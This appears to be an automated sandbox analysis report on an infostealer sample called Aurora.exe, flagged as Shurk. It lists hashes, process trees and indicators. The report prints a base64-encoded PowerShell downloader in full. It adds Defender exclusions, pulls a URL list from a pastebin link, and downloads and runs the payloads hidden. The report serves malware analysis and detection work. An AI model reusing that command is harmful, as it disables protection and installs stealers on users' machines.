Overview
overview
10Static
static
10Aurora.exe
windows7-x64
10Aurora.exe
windows10-2004-x64
10gui/Builder.html
windows7-x64
1gui/Builder.html
windows10-2004-x64
1gui/CHECKER.html
windows7-x64
1gui/CHECKER.html
windows10-2004-x64
1gui/Dashboard.html
windows7-x64
1gui/Dashboard.html
windows10-2004-x64
1gui/Loader.html
windows7-x64
1gui/Loader.html
windows10-2004-x64
1gui/SETTINGS.html
windows7-x64
1gui/SETTINGS.html
windows10-2004-x64
1gui/assets/docs.js
windows7-x64
1gui/assets/docs.js
windows10-2004-x64
1gui/inlog.html
windows7-x64
1gui/inlog.html
windows10-2004-x64
1gui/jSnow.js
windows7-x64
1gui/jSnow.js
windows10-2004-x64
1gui/jquery.js
windows7-x64
1gui/jquery.js
windows10-2004-x64
1resource/R...er.exe
windows7-x64
1resource/R...er.exe
windows10-2004-x64
1Analysis
-
max time kernel
29s -
max time network
34s -
platform
windows7_x64 -
resource
win7-20230220-en -
resource tags
arch:x64arch:x86image:win7-20230220-enlocale:en-usos:windows7-x64system -
submitted
29-04-2023 16:30
Behavioral task
behavioral1
Sample
Aurora.exe
Resource
win7-20230220-en
Behavioral task
behavioral2
Sample
Aurora.exe
Resource
win10v2004-20230220-en
Behavioral task
behavioral3
Sample
gui/Builder.html
Resource
win7-20230220-en
Behavioral task
behavioral4
Sample
gui/Builder.html
Resource
win10v2004-20230221-en
Behavioral task
behavioral5
Sample
gui/CHECKER.html
Resource
win7-20230220-en
Behavioral task
behavioral6
Sample
gui/CHECKER.html
Resource
win10v2004-20230220-en
Behavioral task
behavioral7
Sample
gui/Dashboard.html
Resource
win7-20230220-en
Behavioral task
behavioral8
Sample
gui/Dashboard.html
Resource
win10v2004-20230220-en
Behavioral task
behavioral9
Sample
gui/Loader.html
Resource
win7-20230220-en
Behavioral task
behavioral10
Sample
gui/Loader.html
Resource
win10v2004-20230221-en
Behavioral task
behavioral11
Sample
gui/SETTINGS.html
Resource
win7-20230220-en
Behavioral task
behavioral12
Sample
gui/SETTINGS.html
Resource
win10v2004-20230220-en
Behavioral task
behavioral13
Sample
gui/assets/docs.js
Resource
win7-20230220-en
Behavioral task
behavioral14
Sample
gui/assets/docs.js
Resource
win10v2004-20230220-en
Behavioral task
behavioral15
Sample
gui/inlog.html
Resource
win7-20230220-en
Behavioral task
behavioral16
Sample
gui/inlog.html
Resource
win10v2004-20230221-en
Behavioral task
behavioral17
Sample
gui/jSnow.js
Resource
win7-20230220-en
Behavioral task
behavioral18
Sample
gui/jSnow.js
Resource
win10v2004-20230220-en
Behavioral task
behavioral19
Sample
gui/jquery.js
Resource
win7-20230220-en
Behavioral task
behavioral20
Sample
gui/jquery.js
Resource
win10v2004-20230220-en
Behavioral task
behavioral21
Sample
resource/ResourceHacker.exe
Resource
win7-20230220-en
Behavioral task
behavioral22
Sample
resource/ResourceHacker.exe
Resource
win10v2004-20230220-en
General
-
Target
Aurora.exe
-
Size
25.5MB
-
MD5
5b5049eee909a12420356f785890ee12
-
SHA1
2458920623ab942e1f564cb09ae25fb02b6b76a0
-
SHA256
4e68fa05c32bcd3790d93809a53be10bc4b0b1023dfaef3b101ef0f29a62efd0
-
SHA512
5c7fecb1d55baa008ee4fa90a08c0a1dbbcb2635082a6df51bdacf6fde9fe878f36769fd8099f5a0c371b3e60e5d4ff8e4097bf38346f7167d0a13c9bcdc310c
-
SSDEEP
98304:UlQKxQh+98myGsy1slENtrE7pQ8kq34vEStCAsDrP7J8yStyBCWLRV7VtC4bksxA:QQPY9mgGvkHEAsdtLRVRXgFqKQbEZxRF
Malware Config
Extracted
https://pastebin.com/raw/tPAFrSUD
Signatures
-
Shurk
Shurk is an infostealer, written in C++ which appeared in 2021.
-
Shurk Stealer payload 1 IoCs
resource yara_rule behavioral1/memory/2008-60-0x0000000000400000-0x0000000001D8A000-memory.dmp shurk_stealer -
Blocklisted process makes network request 7 IoCs
flow pid Process 4 464 powershell.exe 6 464 powershell.exe 7 464 powershell.exe 8 464 powershell.exe 9 464 powershell.exe 10 464 powershell.exe 11 464 powershell.exe -
Executes dropped EXE 1 IoCs
pid Process 1752 LXIX.exe -
Loads dropped DLL 1 IoCs
pid Process 2008 Aurora.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 3 IoCs
pid Process 464 powershell.exe 464 powershell.exe 1872 powershell.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
description pid Process Token: SeDebugPrivilege 464 powershell.exe Token: SeDebugPrivilege 1872 powershell.exe -
Suspicious use of WriteProcessMemory 12 IoCs
description pid Process procid_target PID 2008 wrote to memory of 1752 2008 Aurora.exe 28 PID 2008 wrote to memory of 1752 2008 Aurora.exe 28 PID 2008 wrote to memory of 1752 2008 Aurora.exe 28 PID 2008 wrote to memory of 1752 2008 Aurora.exe 28 PID 1752 wrote to memory of 464 1752 LXIX.exe 29 PID 1752 wrote to memory of 464 1752 LXIX.exe 29 PID 1752 wrote to memory of 464 1752 LXIX.exe 29 PID 1752 wrote to memory of 464 1752 LXIX.exe 29 PID 464 wrote to memory of 1872 464 powershell.exe 31 PID 464 wrote to memory of 1872 464 powershell.exe 31 PID 464 wrote to memory of 1872 464 powershell.exe 31 PID 464 wrote to memory of 1872 464 powershell.exe 31
Processes
-
C:\Users\Admin\AppData\Local\Temp\Aurora.exe"C:\Users\Admin\AppData\Local\Temp\Aurora.exe"1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2008 -
C:\Users\Admin\AppData\Local\Temp\LXIX.exe"C:\Users\Admin\AppData\Local\Temp\LXIX.exe"2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:1752 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGwAYgBnACMAPgBTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAAcABvAHcAZQByAHMAaABlAGwAbAAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIAAtAEEAcgBnAHUAbQBlAG4AdABMAGkAcwB0ACAAIgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAGwAcgBmACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcAJwAsACcAJwAsACcATwBLACcALAAnAEUAcgByAG8AcgAnACkAPAAjAG0AZgBrACMAPgA7ACIAOwA8ACMAbQBxAHgAIwA+ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgADwAIwBwAHAAYQAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwBjAGYAYQAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwB5AGoAdAAjAD4AOwAkAHcAYwAgAD0AIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQA7ACQAbABuAGsAIAA9ACAAJAB3AGMALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAcwA6AC8ALwBwAGEAcwB0AGUAYgBpAG4ALgBjAG8AbQAvAHIAYQB3AC8AdABQAEEARgByAFMAVQBEACcAKQAuAFMAcABsAGkAdAAoAFsAcwB0AHIAaQBuAGcAWwBdAF0AIgBgAHIAYABuACIALAAgAFsAUwB0AHIAaQBuAGcAUwBwAGwAaQB0AE8AcAB0AGkAbwBuAHMAXQA6ADoATgBvAG4AZQApADsAIAAkAGYAbgAgAD0AIABbAFMAeQBzAHQAZQBtAC4ASQBPAC4AUABhAHQAaABdADoAOgBHAGUAdABSAGEAbgBkAG8AbQBGAGkAbABlAE4AYQBtAGUAKAApADsAIABmAG8AcgAgACgAJABpAD0AMAA7ACAAJABpACAALQBsAHQAIAAkAGwAbgBrAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAIAAkAHcAYwAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJABsAG4AawBbACQAaQBdACwAIAA8ACMAcwBzAGgAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwB4AGoAZgAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAQQBwAHAARABhAHQAYQAgADwAIwBrAHgAZwAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAKAAkAGYAbgAgACsAIAAkAGkALgBUAG8AUwB0AHIAaQBuAGcAKAApACAAKwAgACcALgBlAHgAZQAnACkAKQApACAAfQA8ACMAcgB0AGsAIwA+ADsAIABmAG8AcgAgACgAJABpAD0AMAA7ACAAJABpACAALQBsAHQAIAAkAGwAbgBrAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAdwBtAHkAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAPAAjAGYAYQBuACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAoACQAZgBuACAAKwAgACQAaQAuAFQAbwBTAHQAcgBpAG4AZwAoACkAIAArACAAJwAuAGUAeABlACcAKQApACAAfQAgADwAIwBmAGcAZgAjAD4A"3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:464 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-Type -AssemblyName System.Windows.Forms;<#lrf#>[System.Windows.Forms.MessageBox]::Show('','','OK','Error')<#mfk#>;4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1872
-
-
-
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
73KB
MD5decf4a367597bd686ed151ee5af53fdb
SHA17e6c4789ee9456d3981997e5392b229c1c070e8c
SHA256c977dcc0c0d1e06083f2d0ae0492afa832757afc8969c12d93ff423f3647175a
SHA51249aa48d942e55dbff5f93d46af47ee788aa7c7aef4ed993c37fe8f5f9840b37d70866f9445df8883b52d73794e11b93bbfffcada6109c7b1be35fae6ef2d4c7e
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\9SQU4M8MEFFF2DTV6VTO.temp
Filesize7KB
MD58e88dc36d1f136dac9608d12d6057866
SHA1205d926ef3e778e3684f4a38af96ec6852d4815c
SHA256784700e787a3a8c81c40183077f446cf1f4053daa8fa183c0c831c228989696b
SHA5122a616ab99395e7f290031c4fbb823244338dcaca432878fa3f8df32795a6cff6df974e2e9cc9435ceae5fe2f8a89a8a870beafa3aa23e73e8958cbe1a269730c
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
Filesize7KB
MD58e88dc36d1f136dac9608d12d6057866
SHA1205d926ef3e778e3684f4a38af96ec6852d4815c
SHA256784700e787a3a8c81c40183077f446cf1f4053daa8fa183c0c831c228989696b
SHA5122a616ab99395e7f290031c4fbb823244338dcaca432878fa3f8df32795a6cff6df974e2e9cc9435ceae5fe2f8a89a8a870beafa3aa23e73e8958cbe1a269730c
-
Filesize
73KB
MD5decf4a367597bd686ed151ee5af53fdb
SHA17e6c4789ee9456d3981997e5392b229c1c070e8c
SHA256c977dcc0c0d1e06083f2d0ae0492afa832757afc8969c12d93ff423f3647175a
SHA51249aa48d942e55dbff5f93d46af47ee788aa7c7aef4ed993c37fe8f5f9840b37d70866f9445df8883b52d73794e11b93bbfffcada6109c7b1be35fae6ef2d4c7e